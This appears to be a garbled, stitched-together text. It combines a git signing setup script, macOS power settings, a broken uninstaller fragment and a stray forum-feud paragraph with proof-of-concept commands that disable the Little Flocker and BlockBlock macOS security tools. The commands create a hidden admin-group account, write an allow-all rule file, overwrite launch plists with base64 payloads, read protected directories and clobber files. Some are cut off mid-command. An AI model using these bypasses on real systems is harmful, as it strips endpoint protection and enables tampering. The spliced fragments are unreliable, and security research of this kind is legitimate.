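#!/usr/bin/env bash
# Configure git to sign every commit with your PGP key.
#
# Prerequisites:
#   1. Install GPG Tools 2 and generate your PGP keys.
#   2. Add the public key to your GitHub account.
#   3. Get your long key id with: gpg --list-keys --keyid-format long
#
# Usage: bash this_script.sh <LONG KEY ID>
set -euo pipefail

# The key id is taken from the command line instead of being edited into the
# script, so a stale placeholder can never be written into the global config.
key_id=${1:?usage: ${0##*/} <LONG KEY ID>}
gpg_conf="$HOME/.gnupg/gpg.conf"

git config --global user.signingkey "$key_id"
git config --global commit.gpgsign true
git config --global gpg.program gpg2

# 'no-tty' stops gpg from talking to the terminal; the passphrase prompt is
# presumably handled by the GPG Tools pinentry agent instead — confirm on a
# first signed commit. The option is appended only if it is not already
# present (the original appended on every run, and did so even when the
# git config steps had failed). ~/.gnupg is kept private because gpg warns
# about unsafe permissions on its home directory.
mkdir -p "$HOME/.gnupg"
chmod 700 "$HOME/.gnupg"
if ! grep -qx 'no-tty' "$gpg_conf" 2>/dev/null; then
  printf '%s\n' 'no-tty' >> "$gpg_conf"
fi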
# Keep a MacBook awake with the lid closed, as an alternative to tools that
# need a kernel extension (e.g. InsomniaX). Each setting is applied to all
# power sources (-a) in its own sudo call; the three calls are independent,
# so one failing does not stop the others. Keep in mind that a machine which
# never sleeps stays awake (and, if unlocked, unlocked) while it is carried
# around with the lid shut.
set_pm() {
  sudo pmset -a "$1" "$2"
}
set_pm sleep 0
set_pm hibernatemode 0
set_pm disablesleep 1
watch prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "any" wcxm
allow prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "/Applications/Google Chrome" r
#!/usr/bin/env bash
# Usage: bash uninstall_vmware.bash
remove() {
echo -ne "Removing $entry ["
sudo rm -rf "$entry"
if [[ ! -e "$entry" ]]; then
echo -ne "OK"
# Proof-of-concept fragments for Little Flocker UI / agent weaknesses.
#
# - An attacker can prevent the agent from showing the app icon (via /dev/null)
#   The icon is presumably read from this fixed path under /tmp, so anything
#   writable there is trusted — TODO confirm. The device node is major 1,
#   minor 3 (/dev/null on Linux; check the macOS numbers before relying on it).
#   Mitigation on the tool's side: use an unpredictable name (mktemp) and
#   refuse anything that is not a regular file before reading it.
#   Clean up afterwards with: rm -f /tmp/LittleFlockerTemp.png
mknod /tmp/LittleFlockerTemp.png c 1 3
# - A file with a long name can hide buttons when the popup appears
#   Note: bash discards the NUL byte of "\x00\x02" inside a command
#   substitution (it warns "ignored null byte in input"), so the name actually
#   created is 254 carriage returns followed by \x02. A prompt should escape
#   control characters and truncate/elide long names before rendering them.
touch $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
nano $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
# - Little Flocker does not watch every startup folder/file, therefore an
#   attacker can create startup items at these places (thanks Patrick Wardle):
#   (the list of locations continues outside this excerpt)
Here is the last discussion I had with him (he dared to mention me on a 10-day-old topic, and then, when I gave arguments on that very same topic or replied to his attacks, I was "harassing" him):
So I’m going to do this really fast to prevent making another blog post from happening again and wasting even more time.
Jonathan recycled an old pastebin he made to do some propaganda against me ( so I'm going to clarify this here, point by point:
Diff between the two pastebins:
# Disarm Little Flocker silently (privileged)
# Defender's notes on this one-liner:
#  - It creates a hidden local account with dscl (IsHidden 1, fixed UniqueID
#    1202, PrimaryGroupID 80 — the admin group on macOS), keeps it for ~61 s
#    and deletes it again. Short-lived hidden accounts are a strong detection
#    signal; directory-change auditing catches both the create and the delete.
#  - It writes a dotfile rc under /var/empty (the home directory of several
#    system accounts) granting "allow prefix / any rwcm"; file-write
#    monitoring on /var/empty would surface this.
#  - The hard-coded UniqueID 1202 will collide with any existing account that
#    already uses that id — TODO confirm how dscl behaves in that case.
#  - No sudo is used, so the whole chain must already run as root.
FAKEUSER=pwned$(grep -m1 -ao '[0-9][0-9]' /dev/urandom | sed s/10/99/ | head -n1); echo "Creating fake user account..." && dscl . -create /Users/$FAKEUSER IsHidden 1 && dscl . -create /Users/$FAKEUSER UserShell /bin/bash && dscl . -create /Users/$FAKEUSER RealName "${FAKEUSER}" && dscl . -create /Users/$FAKEUSER UniqueID "1202" && dscl . -create /Users/$FAKEUSER PrimaryGroupID 80 && echo "Injecting payload..." && echo 'allow prefix "/" "any" rwcm' > /var/empty/.littleflockerrc && sync && echo "Please wait (up to 1 minute)..." && sleep 61 && dscl . -delete /Users/$FAKEUSER && rm -rf /var/empty/.littleflockerrc && echo "Little Flocker is now disarmed" && cd /Users
# UPDATE (0.0.77)
# Still works, broken fix:
# 1. via /Users/Shared
echo "Creating fake user account..." && dscl . -create /Users/Shared IsHidden 1 && dscl . -create /Users/Shared UserShell /bin/bash && dscl . -
# Inject malicious datas into BlockBlock plist (will create "pwned-unprivileged" file in /tmp) (unprivileged)
# The base64 blob is a binary plist (it decodes to a "bplist00" header with
# ProgramArguments "bash -c 'touch /tmp/pwned-unprivileged; ...BlockBlock
# agent'" and Label com.objectiveSee.blockblock.agent) that overwrites the
# user's LaunchAgent for BlockBlock. Mitigation on the tool's side: verify its
# own launchd plist against the copy inside the app bundle at start-up, and
# treat any write to that plist by something other than its installer as a
# tampering event worth alerting on.
(> ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBbdG91Y2ggL3RtcC9wd25lZC11bnByaXZpbGVnZWQ7IC9BcHBsaWNhdGlvbnMvQmxvY2tCbG9jay5hcHAvQ29udGVudHMvTWFjT1MvQmxvY2tCbG9jayBhZ2VudAlfECFjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suYWdlbnQIESc6REpLT1RXtbYAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist)
# Inject malicious datas into BlockBlock plist (will create "pwned-privileged" file in /tmp) (privileged)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBadG91Y2ggL3RtcC9wd25lZC1wcml2aWxlZ2VkOyAvQXBwbGljYXRpb25zL0Jsb2NrQmxvY2suYXBwL0NvbnRlbnRzL01hY09TL0Jsb2NrQmxvY2sgZGFlbW
# Read files (privileged)
# Builds a read-only HFS+ disk image of $DIRTOSEE (size = `du -mc` total
# + 1 MiB) under /tmp and mounts it at /private/tmp/.<hash>. Notes:
#  - DIRNAMEHASH relies on `openssl sha1` printing a bare hex digest on stdin;
#    newer OpenSSL prints "SHA1(stdin)= <hex>", which would put spaces and
#    parentheses into the volume and image names — confirm on the target
#    system and quote the expansions if so.
#  - The image and mount point use a predictable dot-name under /tmp and are
#    never detached or removed; run `hdiutil detach` on the mount point and
#    delete the .dmg afterwards.
#  - If `du` prints nothing, DIRSIZE is empty and $((+1)) evaluates to 1.
DIRTOSEE="$HOME/Desktop/test"; DIRSIZE=$(du -mc "$DIRTOSEE" | grep "total" | cut -d$'\t' -f1 | xargs); DIRNAMEHASH=$(echo "$DIRSIZE$DIRTOSEE$(date +%s)" | /usr/bin/openssl sha1); sudo /usr/bin/hdiutil create -ov -size $(($DIRSIZE+1))m -nospotlight -noanyowners -skipunreadable -srcowners off -format UDRO -fs HFS+ -volname .$DIRNAMEHASH -srcfolder "$DIRTOSEE" /tmp/.$DIRNAMEHASH.dmg && hdiutil attach -readonly -noverify -noautofsck -noautoopen -mountpoint /private/tmp/.$DIRNAMEHASH /private/tmp/.$DIRNAMEHASH.dmg && cd /private/tmp/.$DIRNAMEHASH
# Delete a file (unprivileged)
# NOTE(review): `rpcgen --output` truncates and rewrites the target rather
# than unlinking it, so "delete" here means "replace with rpcgen's output"
# (with no input file it presumably leaves an empty or header-only file —
# confirm). $FILETODELETE is expanded unquoted; quote it ("$FILETODELETE")
# if the path can contain spaces or glob characters.
FILETODELETE="$HOME/Desktop/test/com.evilcorp.plist"; /System/Library/PrivateFrameworks/oncrpc.framework/bin/rpcgen --xdr --output $FILETODELETE